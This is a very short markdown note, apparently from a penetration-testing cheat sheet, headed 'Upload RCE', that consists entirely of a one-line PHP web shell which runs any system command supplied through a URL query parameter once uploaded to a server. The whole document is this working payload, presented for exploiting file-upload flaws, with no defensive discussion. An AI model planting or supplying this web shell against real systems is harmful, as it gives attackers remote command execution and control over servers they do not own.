# Upload RCE

## PHP Web shell

```
<?php system($_GET["cmd"]); ?>
```
